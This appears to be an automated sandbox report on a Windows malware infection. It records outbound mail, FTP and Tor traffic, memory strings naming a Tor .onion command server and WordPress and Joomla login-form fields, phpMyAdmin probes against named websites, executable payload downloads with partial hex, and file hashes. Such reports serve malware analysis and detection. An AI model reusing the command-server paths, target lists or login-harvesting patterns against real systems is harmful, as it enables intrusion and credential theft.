Source: global traffic	TCP traffic: 3.64.163.50 ports 22,143,990,110,1,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 67.231.154.163 ports 143,110,1,3,465,993,4,995
Source: global traffic	TCP traffic: 157.112.187.45 ports 22,143,990,1,2,222,443,465,587,995,80,21
Source: global traffic	TCP traffic: 104.47.73.10 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 160.124.181.5 ports 22,0,143,110,990,222,443,465,993,587,995,8,80,21
Source: global traffic	TCP traffic: 212.227.15.41 ports 25,143,110,1,2525,3,465,993,4,587,995
Source: global traffic	TCP traffic: 162.215.248.230 ports 22,1,2,222,443,80,21
Source: global traffic	TCP traffic: 64.233.186.26 ports 143,110,465,993,587,5,995,9

Source: 5316.exe, 00000007.00000002.2873592935.0000000000824000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Referer: X-Requested-With: XMLHttpRequest Content-Type: application/json;127.0.0.1:--ignore-missing-torrcect[] = --SOCKSPort--DataDirectory--bridgehttp://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/rep.phperr.php?&n=v=b=p=repsf=e=nocache=SEH exceptionSEHSTD: C++.dll4kPv6aJG8e\!update!sleep !regcheckcreateObjectwp-login.phpwp-admin/name="loginform"ionW[] = id="loginform"name="log"id="user_login"name="pwd"id="user_pass"administrator/administrator/index.php ] = id="form-login"action="/administrator= = id="mod-login-username"nd[] = name="username"id="mod-login-password" name="passwd"admin.phpDataLifesubactionusernamepasswordOK{
Source: csrss.exe, 0000000F.00000002.4115690481.0000000000824000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Referer: X-Requested-With: XMLHttpRequest Content-Type: application/json;127.0.0.1:--ignore-missing-torrcect[] = --SOCKSPort--DataDirectory--bridgehttp://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/rep.phperr.php?&n=v=b=p=repsf=e=nocache=SEH exceptionSEHSTD: C++.dll4kPv6aJG8e\!update!sleep !regcheckcreateObjectwp-login.phpwp-admin/name="loginform"ionW[] = id="loginform"name="log"id="user_login"name="pwd"id="user_pass"administrator/administrator/index.php ] = id="form-login"action="/administrator= = id="mod-login-username"nd[] = name="username"id="mod-login-password" name="passwd"admin.phpDataLifesubactionusernamepasswordOK{
Source: A0FE.exe, 00000012.00000003.2188506230.00000000051F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2

Source: http	HTTP: www.newriverclimbing.com/phpmyadmin
Source: http	HTTP: www.u90soccercenter.com/phpmyadmin
Source: http	HTTP: www.ecochild.com.au/phpmyadmin
Source: http	HTTP: artusopastry.com/phpmyadmin
Source: http	HTTP: www.newriverclimbing.com/phpmyadmin
Source: http	HTTP: www.u90soccercenter.com/phpmyadmin
Source: http	HTTP: www.soytijuana.com/phpmyadmin

Source: global traffic	TCP traffic: 192.168.2.4:49748 -> 37.120.168.19:9001
Source: global traffic	TCP traffic: 192.168.2.4:49749 -> 46.20.35.112:9001
Source: global traffic	TCP traffic: 192.168.2.4:49751 -> 38.47.221.193:34368
Source: global traffic	TCP traffic: 192.168.2.4:49756 -> 146.0.36.87:9006
Source: global traffic	TCP traffic: 192.168.2.4:51171 -> 142.250.27.26:995
Source: global traffic	TCP traffic: 192.168.2.4:51198 -> 199.59.243.225:143
Source: global traffic	TCP traffic: 192.168.2.4:51210 -> 154.209.61.218:143
Source: global traffic	TCP traffic: 192.168.2.4:51253 -> 173.194.216.27:143
Source: global traffic	TCP traffic: 192.168.2.4:51265 -> 209.85.202.26:143
Source: global traffic	TCP traffic: 192.168.2.4:51273 -> 173.203.187.1:143
Source: global traffic	TCP traffic: 192.168.2.4:51272 -> 15.197.142.173:143
Source: global traffic	TCP traffic: 192.168.2.4:51307 -> 135.148.130.76:143
Source: global traffic	TCP traffic: 192.168.2.4:51483 -> 20.216.139.123:995
Source: global traffic	TCP traffic: 192.168.2.4:51508 -> 108.163.227.170:995
Source: global traffic	TCP traffic: 192.168.2.4:51554 -> 104.47.75.164:143
Source: global traffic	TCP traffic: 192.168.2.4:51556 -> 104.47.75.228:143
Source: global traffic	TCP traffic: 192.168.2.4:51561 -> 212.159.9.200:143
Source: global traffic	TCP traffic: 192.168.2.4:51574 -> 217.72.192.67:143
Source: global traffic	TCP traffic: 192.168.2.4:51596 -> 162.215.248.42:143
Source: global traffic	TCP traffic: 192.168.2.4:51614 -> 153.92.0.100:995
Source: global traffic	TCP traffic: 192.168.2.4:51658 -> 160.124.181.5:143
Source: global traffic	TCP traffic: 192.168.2.4:51659 -> 3.64.163.50:995
Source: global traffic	TCP traffic: 192.168.2.4:51883 -> 69.49.101.236:995
Source: global traffic	TCP traffic: 192.168.2.4:51912 -> 209.85.202.27:995
Source: global traffic	TCP traffic: 192.168.2.4:51915 -> 64.233.186.26:995
Source: global traffic	TCP traffic: 192.168.2.4:51947 -> 188.165.47.122:143
Source: global traffic	TCP traffic: 192.168.2.4:52036 -> 18.133.136.187:995
Source: global traffic	TCP traffic: 192.168.2.4:52162 -> 195.145.184.85:995
Source: global traffic	TCP traffic: 192.168.2.4:52240 -> 52.101.137.0:143
Source: global traffic	TCP traffic: 192.168.2.4:52280 -> 104.47.71.202:995
Source: global traffic	TCP traffic: 192.168.2.4:52299 -> 91.213.13.233:143
Source: global traffic	TCP traffic: 192.168.2.4:52301 -> 52.101.40.24:143
Source: global traffic	TCP traffic: 192.168.2.4:52420 -> 176.74.27.137:995
Source: global traffic	TCP traffic: 192.168.2.4:52432 -> 104.47.59.138:995
Source: global traffic	TCP traffic: 192.168.2.4:53221 -> 66.96.140.50:143
Source: global traffic	TCP traffic: 192.168.2.4:53524 -> 212.227.15.41:143
Source: global traffic	TCP traffic: 192.168.2.4:53525 -> 52.101.42.10:995
Source: global traffic	TCP traffic: 192.168.2.4:53692 -> 148.163.129.51:143
Source: global traffic	TCP traffic: 192.168.2.4:53829 -> 64.92.112.83:143
Source: global traffic	TCP traffic: 192.168.2.4:53869 -> 162.255.118.51:143
Source: global traffic	TCP traffic: 192.168.2.4:53895 -> 3.94.41.167:995
Source: global traffic	TCP traffic: 192.168.2.4:53902 -> 13.248.169.48:143
Source: global traffic	TCP traffic: 192.168.2.4:53932 -> 44.229.66.233:143
Source: global traffic	TCP traffic: 192.168.2.4:53935 -> 64.233.186.27:143
Source: global traffic	TCP traffic: 192.168.2.4:53937 -> 198.54.122.240:143
Source: global traffic	TCP traffic: 192.168.2.4:53941 -> 143.244.202.96:995
Source: global traffic	TCP traffic: 192.168.2.4:53942 -> 164.90.197.162:143
Source: global traffic	TCP traffic: 192.168.2.4:54037 -> 52.101.73.8:143
Source: global traffic	TCP traffic: 192.168.2.4:54039 -> 162.215.248.33:143
Source: global traffic	TCP traffic: 192.168.2.4:54088 -> 104.47.73.138:143
Source: global traffic	TCP traffic: 192.168.2.4:54092 -> 104.47.55.138:143
Source: global traffic	TCP traffic: 192.168.2.4:54095 -> 66.96.140.165:995
Source: global traffic	TCP traffic: 192.168.2.4:54139 -> 185.53.56.44:143
Source: global traffic	TCP traffic: 192.168.2.4:54327 -> 185.103.16.167:143
Source: global traffic	TCP traffic: 192.168.2.4:54345 -> 52.101.73.6:143
Source: global traffic	TCP traffic: 192.168.2.4:54360 -> 64.182.43.254:143
Source: global traffic	TCP traffic: 192.168.2.4:54377 -> 193.25.197.210:143
Source: global traffic	TCP traffic: 192.168.2.4:54507 -> 157.112.187.45:995
Source: global traffic	TCP traffic: 192.168.2.4:54675 -> 178.33.163.4:143
Source: global traffic	TCP traffic: 192.168.2.4:54868 -> 69.20.103.147:990
Source: global traffic	TCP traffic: 192.168.2.4:55120 -> 103.20.214.243:990
Source: global traffic	TCP traffic: 192.168.2.4:55122 -> 217.70.184.38:222
Source: global traffic	TCP traffic: 192.168.2.4:55123 -> 95.173.180.22:990
Source: global traffic	TCP traffic: 192.168.2.4:55125 -> 185.230.63.107:222
Source: global traffic	TCP traffic: 192.168.2.4:55129 -> 198.49.23.144:222
Source: global traffic	TCP traffic: 192.168.2.4:55141 -> 83.98.155.23:990
Source: global traffic	TCP traffic: 192.168.2.4:55343 -> 15.197.192.55:143
Source: global traffic	TCP traffic: 192.168.2.4:55765 -> 3.33.152.147:143
Source: global traffic	TCP traffic: 192.168.2.4:55861 -> 212.159.8.200:143
Source: global traffic	TCP traffic: 192.168.2.4:55987 -> 66.96.140.52:143
Source: global traffic	TCP traffic: 192.168.2.4:56101 -> 18.133.136.186:995
Source: global traffic	TCP traffic: 192.168.2.4:56120 -> 91.213.13.170:995
Source: global traffic	TCP traffic: 192.168.2.4:56224 -> 3.33.130.190:995
Source: global traffic	TCP traffic: 192.168.2.4:56235 -> 52.101.132.30:143
Source: global traffic	TCP traffic: 192.168.2.4:56237 -> 52.101.40.0:143
Source: global traffic	TCP traffic: 192.168.2.4:56238 -> 104.47.71.138:143
Source: global traffic	TCP traffic: 192.168.2.4:56421 -> 185.112.125.71:222
Source: global traffic	TCP traffic: 192.168.2.4:56599 -> 216.239.32.21:990
Source: global traffic	TCP traffic: 192.168.2.4:56601 -> 205.178.187.24:990
Source: global traffic	TCP traffic: 192.168.2.4:56609 -> 64.250.92.220:990
Source: global traffic	TCP traffic: 192.168.2.4:56793 -> 66.96.140.164:995
Source: global traffic	TCP traffic: 192.168.2.4:56999 -> 147.182.160.18:143
Source: global traffic	TCP traffic: 192.168.2.4:57449 -> 52.101.8.36:995
Source: global traffic	TCP traffic: 192.168.2.4:57521 -> 104.21.18.123:143
Source: global traffic	TCP traffic: 192.168.2.4:57525 -> 67.231.154.163:143
Source: global traffic	TCP traffic: 192.168.2.4:57747 -> 52.86.6.113:995
Source: global traffic	TCP traffic: 192.168.2.4:57750 -> 76.223.54.146:143
Source: global traffic	TCP traffic: 192.168.2.4:57812 -> 35.165.242.85:995
Source: global traffic	TCP traffic: 192.168.2.4:57887 -> 104.47.73.10:143
Source: global traffic	TCP traffic: 192.168.2.4:57888 -> 52.101.68.3:143
Source: global traffic	TCP traffic: 192.168.2.4:58117 -> 104.47.66.10:995
Source: global traffic	TCP traffic: 192.168.2.4:58156 -> 185.53.56.46:143
Source: global traffic	TCP traffic: 192.168.2.4:58266 -> 91.213.13.231:995
Source: global traffic	TCP traffic: 192.168.2.4:58427 -> 52.101.40.2:143
Source: global traffic	TCP traffic: 192.168.2.4:58530 -> 18.133.136.188:995
Source: global traffic	TCP traffic: 192.168.2.4:58538 -> 52.101.73.4:143
Source: global traffic	TCP traffic: 192.168.2.4:58555 -> 52.101.137.2:143
Source: global traffic	TCP traffic: 192.168.2.4:58694 -> 66.96.140.51:995
Source: global traffic	TCP traffic: 192.168.2.4:59807 -> 64.91.249.20:990
Source: global traffic	TCP traffic: 192.168.2.4:59812 -> 216.40.47.17:990
Source: global traffic	TCP traffic: 192.168.2.4:59813 -> 185.230.63.171:990
Source: global traffic	TCP traffic: 192.168.2.4:60623 -> 15.197.148.33:995
Source: global traffic	TCP traffic: 192.168.2.4:60838 -> 66.96.160.139:990
Source: global traffic	TCP traffic: 192.168.2.4:60842 -> 69.49.101.57:990
Source: global traffic	TCP traffic: 192.168.2.4:61019 -> 45.56.74.212:990
Source: global traffic	TCP traffic: 192.168.2.4:61873 -> 103.26.43.131:222
Source: global traffic	TCP traffic: 192.168.2.4:61970 -> 209.126.24.60:990
Source: global traffic	TCP traffic: 192.168.2.4:63033 -> 198.185.159.144:990
Source: global traffic	TCP traffic: 192.168.2.4:63792 -> 104.21.4.150:990
Source: global traffic	TCP traffic: 192.168.2.4:65107 -> 104.21.20.204:222
Source: global traffic	TCP traffic: 192.168.2.4:65121 -> 199.60.103.25:990
Source: global traffic	TCP traffic: 192.168.2.4:65120 -> 151.101.1.195:990
Source: global traffic	TCP traffic: 192.168.2.4:65152 -> 76.223.105.230:990
Source: global traffic	TCP traffic: 192.168.2.4:50600 -> 217.160.0.164:222
Source: global traffic	TCP traffic: 192.168.2.4:50707 -> 213.186.33.19:222
Source: global traffic	TCP traffic: 192.168.2.4:50791 -> 199.34.228.152:990
Source: global traffic	TCP traffic: 192.168.2.4:50826 -> 23.227.38.32:990
Source: global traffic	TCP traffic: 192.168.2.4:51700 -> 198.49.23.145:222
Source: global traffic	TCP traffic: 192.168.2.4:51726 -> 104.143.9.211:990
Source: global traffic	TCP traffic: 192.168.2.4:52524 -> 217.19.254.237:222
Source: global traffic	TCP traffic: 192.168.2.4:52766 -> 208.113.220.170:990
Source: global traffic	TCP traffic: 192.168.2.4:52954 -> 95.128.72.24:222
Source: global traffic	TCP traffic: 192.168.2.4:53110 -> 205.178.189.131:222
Source: global traffic	TCP traffic: 192.168.2.4:53111 -> 217.76.128.47:222
Source: global traffic	TCP traffic: 192.168.2.4:53113 -> 162.159.134.42:222
Source: global traffic	TCP traffic: 192.168.2.4:53115 -> 41.203.27.92:990
Source: global traffic	TCP traffic: 192.168.2.4:53124 -> 162.255.119.149:990
Source: global traffic	TCP traffic: 192.168.2.4:53133 -> 217.160.0.195:222
Source: global traffic	TCP traffic: 192.168.2.4:53181 -> 54.69.113.134:222
Source: global traffic	TCP traffic: 192.168.2.4:53186 -> 67.152.113.12:222
Source: global traffic	TCP traffic: 192.168.2.4:53187 -> 96.45.112.177:990
Source: global traffic	TCP traffic: 192.168.2.4:53190 -> 199.34.228.100:990
Source: global traffic	TCP traffic: 192.168.2.4:53194 -> 77.72.0.94:222
Source: global traffic	TCP traffic: 192.168.2.4:53200 -> 208.113.184.91:222
Source: global traffic	TCP traffic: 192.168.2.4:53222 -> 205.178.189.129:222
Source: global traffic	TCP traffic: 192.168.2.4:54604 -> 199.60.103.125:222
Source: global traffic	TCP traffic: 192.168.2.4:54633 -> 151.101.65.195:222
Source: global traffic	TCP traffic: 192.168.2.4:54690 -> 13.248.243.5:222
Source: global traffic	TCP traffic: 192.168.2.4:56297 -> 108.167.135.109:990
Source: global traffic	TCP traffic: 192.168.2.4:56309 -> 162.215.248.230:222
Source: global traffic	TCP traffic: 192.168.2.4:56341 -> 95.216.227.177:2023

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Wed, 20 Dec 2023 02:12:39 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=30a7378c.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 93 36 6d 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 4a 02 00 00 12 f9 01 00 00 00 00 fb 7d 00 00 00 10 00 00 00 60 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 fb 01 00 04 00 00 b0 9e 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 4e 02 00 3c 00 00 00 00 10 fa 01 a0 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 49 02 00 00 10 00 00 00 4a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 94 f7 01 00 60 02 00 00 6a 01 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 65 68 69 00 00 00 01 00 00 00 00 00 fa 01 00 02 00 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a0 ea 00 00 00 10 fa 01 00 ec 00 00 00 ba 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Dec 2023 02:12:47 GMTContent-Type: application/octet-streamContent-Length: 6968258Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=tuc5.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xm0OnJ5OWRBO8Um7blzL2OzUJRPqv8OI8%2BN%2FnDgN2JdbiPbi28ZX4clFV3PCtv3vbt%2B8w%2Fd3Ju5afQi6wPjyqGY0MWCGiq%2Fqp8z%2B7oKBmGXXBe9mtxbR6prnhuHXNzN7R2eQiqzi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 83845cc51f57d9d1-MIAalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 9f 4d 82 65 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 Data Ascii: MZP@!L!This program must be run under Win32$7PELMeF@@@@P,CODEd

Source: Joe Sandbox View	IP Address: 95.216.227.177 95.216.227.177
Source: Joe Sandbox View	IP Address: 217.76.128.47 217.76.128.47

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 523e76adb7aac8f6a8b2bf1f35d85d1f
Source: Joe Sandbox View	JA3 fingerprint: 83d60721ecc423892660e275acc4dffd

Process:	C:\Users\user\AppData\Local\Temp\is-0OCKQ.tmp\B6AA.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2875391
Entropy (8bit):	6.306445824472355
Encrypted:	false
SSDEEP:	49152:7CEtFh29Lk6ofzVBe7N2ohVoHwdsVNfeSX:uEtFhg4bzfe7TroQd0NfeO
MD5:	025F0305F33F6C3E7F55217194C451AE
SHA1:	AB3CDED0FE2EBECF06A639C2739F4D039A39DED7
SHA-256:	E122E038DF0854C023D89060E1EACBD953C8B8436C1491AB0FC5A64DDFE86560
SHA-512:	DACD5CF8CC3A773D01D6762CEF776B74B7CB0C0F6F7AE54C0582F875EF5C59AA2148BCF14A708331332AA759EF967E7245D114BC4E6761767E928530FAA8F746
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Joe Sandbox View:	Filename: xSLm8YQMXX.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v.mX..>X..>X..>7..>Y..>...>L..>7..>b..>:..>T..>X..>...>X..>K..>n1.>Y..>...>Y..>RichX..>................PE..L.....e.................p...........5............@...........................,.....I.,.....................................X...........x............................................................................................................text....b.......p.................. ..`.rdata...2.......@..................@..@.data...\|O.......0..................@....rsrc...x...........................@..@.tcell....... ......................`...................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\5316.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2021376
Entropy (8bit):	7.91258925332053
Encrypted:	false
SSDEEP:	49152:nQCcNRNesmcy+R1ILb5yQSa+k38buZWQZ7AL4PP8O:nVcNRpy+cf5yQAihv7i4HJ
MD5:	F5404C44B8FB624AD16068D23D269886
SHA1:	CB5F72CEA1EC6BAA806AD12359BECC29F9D8EA90
SHA-256:	ACF231E2E45D787EC58F155B0D6EB302126558F6AACE15002A7F2C1CB653899D
SHA-512:	C2A27273644A6723C4EEDAE0601DD75C638F30A4844B1AC4297910FB331BD6EBFFAA126BEDD54F6CF2555C2E3B18006EC404574CF916566239204836696974F7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...K..c......................D......0............@...........................`......q..........................................d....._............................................................0...@............................................text............................... ..`.rdata...L.......N..................@..@.data.....B.........................@....rsrc........._.....................@..@................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	87844
Entropy (8bit):	3.0814297341560883
Encrypted:	false
SSDEEP:	1536:+3S8nSJZKzqpIQhz2a4VQRaAVtaADZIaVonMv5H:+3S8nSJZKzqpIQhz2a4VQRaAVtaADZIo
MD5:	8657E65778C019DB29DFC6548DCA02C5
SHA1:	C83AE1AF80A68E5C598BE3FC1AAFD9622F56F27B
SHA-256:	E503A343D89401976DF1B1E8A3A700B883FF29761E32C834A4986EB77EA44F45
SHA-512:	A6009A205C100B58CA131F6ADDB68EB32C6CBBCD288EE07A73D575EC563C1A6150B910B0143D6BF32E2BC3F8197EB65182ED835BEE1AC3A5328A3C6C4D1048A6
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

Process:	C:\Users\user\AppData\Local\Temp\7B24.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
